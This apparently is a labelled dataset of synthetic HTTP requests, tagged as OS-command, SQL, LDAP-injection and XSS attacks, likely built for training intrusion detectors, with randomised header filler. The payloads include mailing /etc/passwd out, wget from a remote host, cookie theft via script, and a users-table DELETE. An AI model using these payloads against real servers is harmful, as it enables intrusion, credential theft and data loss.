GET /stdin6v20J/H-Eimg5NK4cpCKdqh/taxildfttgabcevTos/rfqZPi-ALJdHSWhK/tCHi4Y/87l.js?KD.K8Uuj=ttRG&uHmocnaoEan=tp&e4qyabsjae=%28i++%3C++++count%28Eokgi%2Fchild%3A%3Atext%28%29%29+++and+++++j+%3C++++count%28ondrpl%2Fchild%3A%3Acomment%28%29%29++++and++k++%3C+++++count%28srts%2Fchild%3A%3A*%29+++++%29&bt=Fma&Sepo=oc+strensnaedbN&if=nOnanast9lcc%296e9C&amyiarehte2lr=yidna+%7C9++%2Fcatb&eed1ien=p HTTP/1.1
Host: 230.197.147.116:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-7, windows-1250;q=0.6, iso-8859-2;q=0.3, iso-10646-ucs-2
Accept-Encoding: *;q=0.0
Accept-Language: t6jdadgT-eows4;q=0.9, acuflewy-oehhjtfn;q=0.5, mgat-oIt
Cache-Control: no-store
Client-ip: 111.175.169.32
Cookie: connectRMQdZinputOI6mn=selectafroma =/urestconnectn ruoeval;n.EWG9f=insert l);hbotstohgbesing=t1.8ueswCb@;ouv=iptzC;71g=3504;se8eetnenlisMdn=uesyGhTo
Cookie2: $Version="963"
Date: Fri, 17 Sep 04 21:52:05 UTC
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: zaaoof=ntntvtyD
From: n5thibdN@srSdAet.st
If-Modified-Since: Sun, 10 Jan 10 12:48:37 GMT
If-Unmodified-Since: Fri, 10 Dec 04 13:50:15 GMT
If-Match: "GcEp3ypmu@-2ZUfMk"
If-None-Match: *
If-Range: *
Max-Forwards: 078
MIME-Version: 3.2
Pragma: Ntopth='cTr'
Proxy-Authorization: htefu trde6=iidO
Authorization: NTLM aG9hb3JuNnR4Z2JjYXRhaHd5ZDA4T2hlcnpxVFR0ZXI2aW5F
Range: -756843,-771,-94
Referer: /rnlMj/ehrqe/7heoHr8A/ocao2itd/iewE.swf
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.7 (compatible; Konqueror/6.7; Solaris; Rbergsei0)
UA-CPU: Sparc
UA-Disp: 247,139,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5758x491
Via: 7.8 150.62.227.45
Transfer-Encoding: gzip
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 125.87.11.223
X-Serial-Number: 812184590933752195
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49450
Start - Id: 43671
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 215.185.124.88
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.3, gzip;q=0.0
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 158.250.190.86
Cookie: Ignj=9Sur;whl6fsnl0R9er=hqo13bsode1i;wa7= mac;nestahnxaa=tt;Deryer3hrms5Tst=:p/:;yWRb_J0Mobject1=935
Cookie2: $Version="617"
Date: Sat, 29 Nov 08 23:53:20 CET
ETag: "y-vPzRAwL-5olCNDYBs"
Expect: 100-continue
From: r63aj@miwmhwde.ch
If-Modified-Since: Wed, 27 Feb 08 19:17:13 UTC
If-Unmodified-Since: Mon, 14 May 07 06:24:17 GMT
If-Match: "P7.e7i0E4EyC6KWtILu0"
If-None-Match: *
If-Range: Sun, 31 Jul 05 13:20:23 GMT
Max-Forwards: 2532
MIME-Version: 2.2
Pragma: no-cache
Authorization: Basic bWllc3I6aHVzNmVubzc=
Referer: /xIumy/ss6miacg.gif
TE: chunked;q=0.2,deflate
User-Agent: IolgtB
UA-CPU: Sparc
UA-Pixels: 697x5821
Via: 5.6 40.21.55.90:554
Transfer-Encoding: identity
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 309 41.169.220.190 "skootttttuEirTl" 
X-Forwarded-For: 129.156.147.149
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43671
Start - Id: 35082
class: SqlInjection
GET /clocationmap/eKFR0-NIvUWn1e/nYf.v0Xwb/e5texhi9ac/wes/jJKleCwefYfZzoGFvoHa/ky4US@hi7s_/5weetooE/lPB2rbElqPj86Od0@rD.jsp?0iatbaw6wo8=leohjpleiraotsid&0IF7shutdownp.L0an3=eujq4%2Beihttpr%3F%3E%29h%26e&nizibrs3=35&aeecs4a=Esoteetd3ru&3ooI=992167&jled6tTe9dda=c&Z6istyle=bjy&CS=wGu6lkd HTTP/1.1
Host: www.rin3thsei.st:511
Connection: 1Swonp
Accept: */*;q=0.4
Accept-Charset: us-ascii;q=0.5, iso-8859-7;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: ') UNION ALL     SELECT     e2rvAoi    , 0no0h   ,  woef  FROM  WMnrmaih   WHERE   mgbtcEia  NOT IN   ( 'ygto7')    AND   sew   NOT IN   (   'naeAn' )  AND  ''   = '
Cache-Control: only-if-cached
Client-ip: 111.16.114.207
Cookie: rn6FUs=aHAVyQ01xWXX;o2hItlyoytmnnco=eGAfLbRP;elree=jhmHrkt;a0eihntepws7le4=~/jtHhritt&qQautoexect
Cookie2: $Version="2"
Date: Tue, 16 Nov 04 22:35:00 CET
ETag: W/"JVq4.x4yGGpH_c1y"
Expect: oirear=qtrdrveo
From: Mmizi@4src7zo.fr
If-Modified-Since: Tue, 29 Nov 05 15:13:47 GMT
If-Unmodified-Since: Wed, 17 Dec 08 07:14:53 UTC
If-Match: "GCA@Xsb@fcoVNjNzXsr"
If-None-Match: "6MFmP267AZROmtbST"
If-Range: "UbBa@T45I8ZlT06"
Max-Forwards: 98
MIME-Version: 0.2
Pragma: oR='aleiXSar'
Authorization: NTLM bzhvdGVpaW90dGhyYXIxTWMzb3FpYXJkc2Vobm81ZW15ZW5zaXBudGNzbnJqdg==
Range: 403-
Referer: http://1eH0boh2.uk/ldqome.tiff
TE: chunked,gzip
Trailer: Referer
User-Agent: qlFmnda/9.2.1.4
UA-CPU: MIPS
UA-Disp: 7830,290,16
UA-OS: Linux
UA-Pixels: 2919x9096
Via: 4.5 www.4qeTvTe.js
Transfer-Encoding: gzip
Warning: 833 www.analD.tiff "ooresNgsd1nroHr" 
X-Forwarded-For: 23.227.31.112
X-Serial-Number: 51475
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35082
Start - Id: 41160
class: SqlInjection
GET /mY_DN3o9e3/msltroua/oj/afpnatc3as/ajn2ri/jSzOSo/pweoeMooecwnTo/lD7KRPQqWUNXJkYDuRPF/appetydmeriirorsiai/oPqimgbj@TTnc.aspx?rtaso=bulk+++insert+eraadie+++++from+++%27pwdump.exe%27+++++++++with++%28codepage%3D%27RAW%27+%29&uhmqxo=1974645&oNA=a-zL35&access_logL474bprocessing-instructionbOJ=008&jl=ishpasswd%26zra0uwi&npeeneondyeekO=n-v8q HTTP/1.1
Host: 139.57.222.99
Connection: spWi
Accept: */*
Accept-Charset: x-mac-chinesetrad, iso-8859-8-i;q=0.9, windows-1258;q=0.1, iso-8859-5;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: min-fresh=41236
Expect: 100-continue
If-Modified-Since: Mon, 16 Oct 06 05:03:00 GMT
If-None-Match: "Q1um6ed4Na-J2dl"
Pragma: no-cache
Referer: /miiea5St/lc8caa54/ecbya.shtml
User-Agent: meet/2.1.7.5.5
X-Serial-Number: 6679989811

null

End - Id: 41160
Start - Id: 47545
class: XSS
GET /8InI6E.DeV74i5yN/szex6nKpwFVsNGZp/eM/kQ@6Gk3lZVCyHr5A/2eTeois3uNicmr/usn10in1ronnbwtaa/igw.php?LGdi2=h0Qap&Jawp-Xze7p=izsobjectt4+httscie1%3Fert&8x4O8mochacopykDJ4=%3Cstyle++type++%3D++++%22+++++text%2Fjavascript+%22++++%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.aressiol.com%2Fcgi-bin%2Fransve.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle%3E&iettaqo2hot=osede2EtNo7ei9ao20&Pampafum2ttgso=dIb22SOyIF&9opensMQb=22428&eryosi6shobn=e2dropot&3hOn2jT2E2=0axAfahet&hAttkreO=ies8doo&QP2-Shtpass9DXhomeX=abgsound HTTP/1.0
Host: 17.253.149.197
Connection: keep-alive
Accept: audio/*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 124.42.14.246
Cookie: r1vb=dMx@0jzgk;7dn09en=zi2fo;ieYisek4=433676;ssyEntzp4r=qpMtfgUvhxz;n9eT0e=prHLat5wtrhUDg;etii=cmT5aii4jeg0o
Cookie2: $Version="8"
Date: Mon, 04 Jul 05 12:15:26 UTC
ETag: "6nFxzQaTDZaiAJB"
Expect: Aaakre3t=bPm8Duh;h4pbg6
From: sevLsg9@hooNmu.fr
If-Modified-Since: Sat, 08 Sep 07 24:51:27 CET
If-Unmodified-Since: Thu, 19 Jul 07 11:31:06 CET
If-Match: *
If-None-Match: "nlPvheeUYn6NMvD."
If-Range: Sun, 21 Sep 08 21:52:12 UTC
Max-Forwards: 204
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest uri=/kldnret/2UzEy/cbia3dnl.aspx
Range: 35190-213,56187-
Referer: /msicpEld/liqnHtm/neeEtn/essuhfm.zip
TE: gzip;q=0.8,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.4 (Windows; U; Windows NT 9.2; rg-tS; rv:0.9.7) Gecko/17709876
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2187x3503
Via: FTP/4.0 www.hdeuScr.js, 4.5 www.jataepha.js, HTTP/2.4 www.adgh.shtml
Transfer-Encoding: rqbcIi; ntkntoee=ioid
Upgrade: v8h/0.4
Warning: 992 www.4eiian.js "meeteeolpwgufO" "Tue, 02 Mar 10 02:39:00 CET"
X-Forwarded-For: 112.231.125.157
X-Serial-Number: 57604389
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47545
Start - Id: 38268
class: LdapInjection
GET /oDiZnIxVAjHPuf27ot/xcb/wpNo2cCn5JYTfFq/sURNtYx5XC/Bl@/62s8GideletekQ/aodhme/emerfktzdtYifsie/eedcgndsreim2/nqkSa..IUvEep_-t6/tsngngobnowbyP/log6node4AcWmENux.js?dLbM@FlinkWod=7044405&oKn=goo&rorza3abmvvrosS=mg8nv&CzJprocessing-instructionrtbj=733746&SWEdJ=2&8b3=CLemseunEewbhoncn&4Byyx_9kK=tKO2x&utoerseh3fp9d=35488186&Kn7s36arinxmh=d%3C&ticetielt=461&oGhcavnwyo=0&.allhP=1854362&Y6-5J=8469583&eOeheonyt=gN7%29%28+++%7C%28e7ga%3D*%29 HTTP/1.1
Host: 255.25.58.224
Connection: Laeycet4
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.3, compress, compress;q=0.9
Accept-Language: *;q=0.5
Cache-Control: max-age=03
Client-ip: 135.46.160.61
Cookie: drupTeabglDt=rL
Cookie2: $Version="03"
Date: Fri, 11 Aug 06 16:28:30 GMT
ETag: "xLkq_i3QX6CthVv"
Expect: cpms=ow8wwrn;perranl
From: iaon@um9ltetugp.biz
If-Modified-Since: Tue, 21 Mar 06 09:28:53 GMT
If-Unmodified-Since: Thu, 31 Aug 06 08:57:45 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 10 Aug 05 13:14:25 GMT
Max-Forwards: 99
MIME-Version: 6.7
Pragma: ahcgitt='9alT70Lm'
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: Basic RG90bWQ6OWVhZXRzaA==
Range: -5579,771-978291,041342-
Referer: http://www.Cnhaolle.uk/mgoOoa/otimc/d5rogeek.jpeg
TE: deflate,chunked;q=0.7,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.9 (Windows; U; WinNT 2.8; et-ms; rv:6.6.1) Gecko/44531305
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4041x0261
Via: 7.2 207.85.189.179
Transfer-Encoding: gzip
Upgrade: 0atE/2.5
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 169.43.23.55
X-Serial-Number: 5189731
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38268
Start - Id: 41001
class: SqlInjection
POST /erjdsaaihnam/ttcstne0/fhxsO.jpeg? HTTP/1.0
Content-Length: 202
Content-Language: 7e
Content-Encoding: identity
Content-Location: http://top6jr2u.org/hCea1.jsp
Content-MD5: dGVvaXVoc21sc3Nzb253aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 19 Aug 06 01:54:52 UTC
Last-Modified: Wed, 21 Sep 05 12:11:13 CET
Host: www.XuoiIe.uk
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, gzip, deflate;q=0.6, deflate;q=0.9
Accept-Language: Enic4a-yis, inrnen5-uulHb, phthnq-mbgexep;q=0.1, y-po
Cache-Control: no-transform
Client-ip: 86.11.222.202
Cookie: T-.v=likehh)metcfEt/;Oz5q=oxhyrns;lLYgBchildG=Ia9utmtt
Cookie2: $Version="889"
Date: Wed, 04 Mar 09 01:26:47 UTC
ETag: "C22-tP4LIZVnzoLNcYpW"
Expect: 100-continue
From: syMege@l8wshrfu.st
If-Modified-Since: Fri, 06 Oct 06 09:10:21 CET
If-Unmodified-Since: Sat, 01 May 04 21:34:38 CET
If-Match: *
If-None-Match: "bDO56@3M8lka6z_p-mb"
If-Range: Sat, 11 Nov 06 03:09:49 CET
Max-Forwards: 66
MIME-Version: 8.3
Pragma: no-cache
Authorization: 9etso itrab=ohxvo2N
Referer: /gtimd/bedy3sl/c6i5w/tttNcpsS/adr6tr.txt
TE: chunked;q=0.5,trailers
Trailer: Expect
User-Agent: sgaCteekaS8etai
UA-Pixels: 892x2342
Via: HTTP/1.6 www.n6i3esI.html:06
Transfer-Encoding: gzip
Warning: 092 www.iatd.shtml:71805 "ctDcdozaQeosubhna" "Tue, 21 Sep 04 21:29:02 UTC"
X-Forwarded-For: 250.186.208.209
----: ------------

ptan=93&YJzXc=28011813&a4esoNAeaeShe=';    EXEC   master..sp_makewebtask   "\\234.145.17.9\sh5t\grnl.png",   "SELECT     *    FROM  INFORMATION_SCHEMA.TABLES"&ltjBm83nEOAhs=lnubbHC

End - Id: 41001
Start - Id: 43175
class: OsCommanding
GET /e3O1obkKGQj6IU57TD/rpikFWdQR3o@9V2yl/ttYfafxjjtosdaesla/epdUeTeeednthm.php?yyaoyhhnntso=83953&is3rctSaf9lb=nric&tuhu=yEzha4c8teh5ot&y8sndhnuYOotN=41&eLdGkac2TtkgeE=91609&fitoutUeeUetynb=212987&tlk=0&ltjemuuDg=oweif3seo&hslnu3bhotith=r%40Ck9nkpg&iihfikqjtiB6not=oops++%3Bcat+++%2Fetc%2Fpasswd++%7C++++mail+your%40rZdi.com&niAerhMyfsttl=24860566&wtc=9103401170&67nutitcch=includers5%2F5%25&rZOautoexecFN=oEjOd&5DAq=48 HTTP/1.1
Host: 145.63.234.183
Connection: close
Accept: */*
Accept-Charset: windows-1257
Accept-Encoding: *;q=0.9
Accept-Language: mG7-lEHRu, s0-nofdhnt;q=0.6, bs-a;q=0.2
Cache-Control: no-store
Client-ip: 101.140.81.249
Cookie: vEenuoand4oogSe=Eeq2se6telnet;9l1i1ct=otoy7xce;iaOEtt=08467;eeu5ohlh=3001891
Cookie2: $Version="3"
Date: Fri, 30 Apr 10 15:03:59 GMT
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: spog@iutmqee.net
If-Modified-Since: Fri, 05 Mar 10 06:21:51 GMT
If-Unmodified-Since: Sat, 06 Oct 07 10:03:27 UTC
If-Match: "5_q@3@49fMZut0yT"
If-None-Match: "9G-r3zudstkL2b4S"
If-Range: "DrFnScXkp9v11pRz0s"
Max-Forwards: 0791
MIME-Version: 6.0
Pragma: a7r20='al'
Proxy-Authorization: coloIh rs8x9a=2Iwcett
Authorization: Digest nc=aB8a6c30
Range: 332370-1588,656-95
Referer: /tcIo9thC.bin
TE: trailers,deflate;q=0.3,trailers
Trailer: Max-Forwards
User-Agent: ePabs0fe8h
UA-CPU: Sparc
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 953x846
Via: HTTP/4.7 136.89.218.88:29233, 5.6 27.201.152.106
Transfer-Encoding: deflate
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 415 2.136.43.50 "wzmsseuobh" "Mon, 09 Jul 07 20:41:04 CET"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43175
Start - Id: 36970
class: LdapInjection
GET /dtpimareHul8ererm/7giMhortph/rEn/n0dIgoh/script9Y8H/vWR3mBiWDvSQYbK7/etcnmoa/yYXUeUE_8zkzt7p/t5/sve@6a1prYAe/fuo7eianczer/Lr9rmL0ZMp.tiff?nfu=ei+yRy&EUf99.Piframe46=%29+%28+%7C+%289bpa%3Depc6*%29&dfeahanaI5a=4570540&oabnoXeeg=%408%7E&oberdvi=honiic7c&jieoyesimhLae=egU&rdueg8amRushe=lt3e1&nrtal=link HTTP/1.0
Host: www.ssfefp.org:2
Connection: jTas
Accept: video/quicktime, image/*
Accept-Charset: iso-8859-5, windows-1250;q=0.1, x-mac-chinesetrad
Accept-Encoding: compress, identity, identity;q=0.7, compress, compress
Accept-Language: ytr-b9ena, l-eozni, e-1;q=0.6
Cache-Control: max-stale=013
Client-ip: 248.80.57.117
Cookie: tF-viLcUWf-=eabrxiict2system;aacvtaepxfwmihA= 
Cookie2: $Version="3"
Date: Sat, 31 Dec 05 09:52:19 CET
ETag: W/"kRj_Ud1No8MgV-PGN5a"
Expect: 100-continue
From: fipt@jjMrleib1.biz
If-Modified-Since: Sat, 27 May 06 05:43:22 UTC
If-Unmodified-Since: Sun, 04 Nov 07 04:41:52 UTC
If-Match: *
If-None-Match: "b81RCllo4JeISay"
If-Range: Sat, 06 Aug 05 17:22:10 CET
Max-Forwards: 527
MIME-Version: 0.9
Pragma: lno13wco='ceet'
Proxy-Authorization: Digest opaque="cttu"
Authorization: NTLM ZXBuYXRUNW9zamhlbk50cGN5ZWdSOGtOYW9laGR3VWV1Z2FPcTBi
Range: 84-,-422477,1197-5319
Referer: /g7isrF.swf
TE: deflate;q=0.0
Trailer: Max-Forwards
User-Agent: macso8idy1 (yuJNAPl; tEry4W)
UA-CPU: StrongARM
UA-Disp: 553,0581,32
UA-Pixels: 654x7541
Transfer-Encoding: gzip
Upgrade: eslm/4.5, njAt/8.0
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Serial-Number: 36508239
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36970
Start - Id: 37211
class: LdapInjection
GET /wd23X82GS1j1-1tP_/4IBpGp/lm/r5vG/tod/ielmlShdeeya9/fqiOlJ_5YO5prlxU/access_logxSa/rsimgK/thon.jpg?etpjan=eq%29%28%26%28objectClass%3D+npz*%29 HTTP/1.0
Host: 134.222.88.28
Connection: keep-alive
Accept: application/*;q=0.8, image/*, text/xml;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.9
Accept-Language: t-sxilzlli, it-2ehi1u0c;q=0.3, ci-wist
Cache-Control: max-stale
Client-ip: 98.210.207.217
Cookie: swFvosbesmm=8taoercpsmeeit;dkc=0410525
Cookie2: $Version="43"
Date: Mon, 07 Aug 06 20:42:13 UTC
ETag: W/"nGU3RVy8tOKIK4L"
Expect: 100-continue
From: ejgouV@q9tOejr.uk
If-Modified-Since: Thu, 04 Sep 08 19:47:21 GMT
If-Unmodified-Since: Wed, 30 May 07 10:15:02 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Jul 04 07:55:35 GMT
Max-Forwards: 5682
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZHdiZFdlOm9kaWdlVWF0
Authorization: Basic ZWxiNTpydDMw
Range: 605-286224
Referer: http://www.xnleis.de/eOeefot/onril.swf
TE: deflate,gzip,chunked;q=0.9
Trailer: Max-Forwards
User-Agent: RociIo (hPCr7yQ; 0mLU._; tsvxFJNX4u; kELqIKfmX; g5x68qWv2G)
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: HTTP/9.0 123.213.232.65
Transfer-Encoding: ntwcr; alher7=urwa8
Upgrade: etyvet/1.7, 9mEHd/4.9, saaq/1.8, 9irhSi/8.2, ooten3/4.3
Warning: 835 30.241.51.47 "4eor3o4bh0icK" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 973297601016037015
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37211
Start - Id: 41506
class: SqlInjection
POST /xp_9_Ipasswd1/eneu/oa6SrsUtretbqb/XcT79MNUSkSENS/xssetre7/etmnbx7ewF/cdlnHOsamltbKMzj/8crylvae/ugyeYazbolngyysgr.js? HTTP/1.0
Content-Length: 174
Content-Language: h,rRm7ieo
Content-Encoding: deflate
Content-Location: /dodlstfn/ahoDgju/leNoshd/cnnnsedy.mpeg
Content-MD5: OEhpdG1lZGluYkFlbWRpaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Jul 08 08:48:00 GMT
Last-Modified: Thu, 09 Jul 09 05:52:17 GMT
Host: www.eiceurt.net
Connection: close
Accept: */*
Accept-Charset: windows-1254, ks_c_5601-1987;q=0.0, x-mac-korean;q=0.0, shift_jis
Accept-Encoding: gzip, deflate
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 3.29.1.103
Cookie: h0tc=eemmeamf5md;esomlhIg3yleee=np_;dh=neHcPJto
Cookie2: $Version="3"
Date: Fri, 19 Dec 08 12:04:13 UTC
ETag: W/"Ohan5E8Ng@JLl6b"
Expect: maEbbf
From: pfpr@iosyoa.gov
If-Modified-Since: Wed, 27 Feb 08 18:13:01 GMT
If-Unmodified-Since: Sun, 07 Mar 04 04:55:01 UTC
If-Match: "jS_@PhBQ.eTxcRurXC"
If-None-Match: "zBaWVeRsJOGOdfic3"
If-Range: *
Max-Forwards: 431
MIME-Version: 9.8
Pragma: tRtc9iaa='enssm'
Proxy-Authorization: NTLM ZWx3bnJjY25jVGVvbzkzZHRuMWFhbGFydzVhcmVuaHl6YnF2Yw==
Authorization: NTLM NUFFU3NsaXh5cWFuZW5wbmU5YWpMRWVTb3V3dHRlZWNsNmRhc2Jybg==
Range: 229-94,-0,-455
Referer: /ithL/ndavtt/truzs.ace
TE: gzip;q=0.6,trailers
Trailer: User-Agent
User-Agent: wttna7ltai1seeasrari
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6912x601
Via: 0.8 www.uuteUZl.shtml, e3epcc/9.0 9.187.170.229
Transfer-Encoding: deflate
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8yYFsmbTV=82699&disiweniHr= Zsopyl&OeYu9c4rpLs6=ee4ty'    );  DEL/**/ETE FROM     users  WHERE    upper(username)     =   upper('admin&erla=idrbl&emess=74

End - Id: 41506
Start - Id: 36696
class: OsCommanding
POST /oiRXIM.jsp? HTTP/1.1
Content-Length: 178
Content-Language: h9,yBss1
Content-Encoding: compress
Content-Location: http://www.wtapYeN.org/watCl57/uneft/isct/ipenhnNs/lGnodnT.jsp
Content-MD5: NnVkbGNlYmVhZHRudWVvZg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 May 07 24:38:47 CET
Last-Modified: Fri, 05 Mar 04 19:28:49 CET
Host: www.atte5oeaa.gov
Connection: nsuidosE
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 83.189.215.58
Cookie: its=2eiyaasF7oe;ncuO4ahqzLUz_=13395375;yYyic7enw=cSBIGAS.9_;yrekIaxae=mV3m9-
Cookie2: $Version="30"
Date: Sun, 05 Aug 07 21:18:48 CET
Expect: 100-continue
From: debomi@hLAy.be
If-Match: "36xnzueWE8q@hfH.yFXT"
If-Range: Tue, 06 Apr 04 09:26:19 UTC
Max-Forwards: 9425
MIME-Version: 8.8
Proxy-Authorization: Basic RWNlanNsNG46dGM3MHhv
Authorization: m8d4 ltrie=btrlliai
Range: 6660-
Referer: http://www.wm8Mstm.org/iweaaOo/lEdip.gif
TE: trailers
User-Agent: Mozilla/9.2 (Machintosh; U; Mac OS X 9.6; ox-ir; rv:4.3.3) Gecko/16017295
UA-CPU: StrongARM
UA-Disp: 1584,454,32
UA-Color: color32
UA-Pixels: 654x545
Via: FTP/4.3 www.nfed.jpeg, 0.4 207.157.93.68, 6.6 221.107.236.159
Transfer-Encoding: identity
Upgrade: rqbee/8.8
X-Forwarded-For: 123.125.191.125
----: -------------------------

easAe1acmaht3=evpnfelg&8XjyQ2@divK=00260&64S.MLlFV="    ;     /usr/bin/wget     www.liilalch.com/ritima;&BJo2tpasswdTE8R=da)urhT(igraX&7e7adAi=83609515&h2=tceew

End - Id: 36696
Start - Id: 35131
class: SqlInjection
PUT /y_c/7isyaeoy4T/oVRQkpasswdkx/ey69zEodSeCan/Gsiae/nl4_rplMo9-l/iohmloshao7t/9Kaorze/sPv19YigsGh/104XKcOqnYF/e385p0c.asp? HTTP/1.1
Content-Length: 133
Content-Language: 8uGt,tpwuy
Content-Encoding: compress
Content-Location: http://aod1.cz/cvsm.jsp
Content-MD5: NXNEMXdudDA1dXVpOWU5ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Aug 08 22:27:38 CET
Last-Modified: Sat, 19 Jun 04 17:27:38 UTC
Host: www.hyyIa.it:5961
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257, euc-tw, windows-874;q=0.4, iso-10646-ucs-2, us-ascii;q=0.0
Accept-Encoding: gzip, identity, identity;q=0.4, identity, compress
Accept-Language: *
Cache-Control: yjLa=y
Client-ip: 8.117.247.176
Cookie: 4nab6ezjei=rfa
Cookie2: $Version="43"
Date: Sat, 06 Dec 08 09:50:07 GMT
ETag: "wECWPXUQhi-PB9N"
Expect: 100-continue
If-Modified-Since: Mon, 30 Mar 09 20:40:59 CET
If-Unmodified-Since: Mon, 28 Jan 08 20:40:25 CET
If-Match: "TRPBEfuXE5aCke9d"
If-None-Match: "TgYUygSVUAV0SzAChIny"
If-Range: Sun, 02 Aug 09 23:58:45 UTC
Max-Forwards: 6
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: etCav tnHsfL=otrbqsW
Authorization: Basic ZXZzbDpybjNuYm5l
Range: 9644-,893-04607,798896-
Referer: http://idoi.be/i2sibDt/src7pd/faesauR/grii.asmx
TE: trailers,trailers,deflate
User-Agent: Mozilla/4.2 (X11; U; Linux i586 8.6; ha-gH; rv:0.8.2) Gecko/95499198
UA-Disp: 124,974,8
UA-OS: Windows NT
UA-Color: color8
Via: 4.3 158.99.178.146, 4.3 57.150.156.12, AIm/5.9 www.arei.shtml
Transfer-Encoding: rdtn
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

plub=sye&2rCh1=170&ta5ntxxIe=216142&WouNw8weUA@=' AND     USER_NAME()='cn&lestietsyat=rtpCdfUyrxf&lqjesesTanacip=69ykKUERIi

End - Id: 35131
Start - Id: 38585
class: LdapInjection
GET /mailIHurcpscriptf0/oreEOieiib1Nd/araceq/c7/ln24ar/puatHaaeycto86oineih/zrqlayte/jQdyb/91iq.@YZrYUoSRPrDz/1lsgnullwinntDt/08qfaeetBazzrasngero.dll?ihlnj03Wh0=346807&msba8un9ram=%29+++%28+%7C%28displayName%3Dhad*%29+%28name+%3D+had*+%29%28++mail%3Dhad*++%29&xbzH2Og=6&Il=4&2uyn3=0a&5ae=slncpoefTl&replaceHSE=o%27nagninda+e-8H&uretc1ds=lai9%24+r+2-I&a99cdoEscjeembn=eval%26hioe7m&rclyrebem0s=t1eseHelft&autieEigo=rci&ehdehshstpy=526134&eeksanymas4Opue=aiewi HTTP/1.0
Host: 4.129.40.169
Connection: iawh
Accept: video/mpeg, image/*, image/*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.3, deflate, compress, identity, deflate;q=0.8
Accept-Language: *
Cache-Control: max-age=88
Client-ip: 97.13.224.109
Cookie: 8_ypV=4;nEre=16;rdrnypideaaeth=jgi;UF22NYIn20Yv=p;cgo4rotUjyP=952
Cookie2: $Version="7"
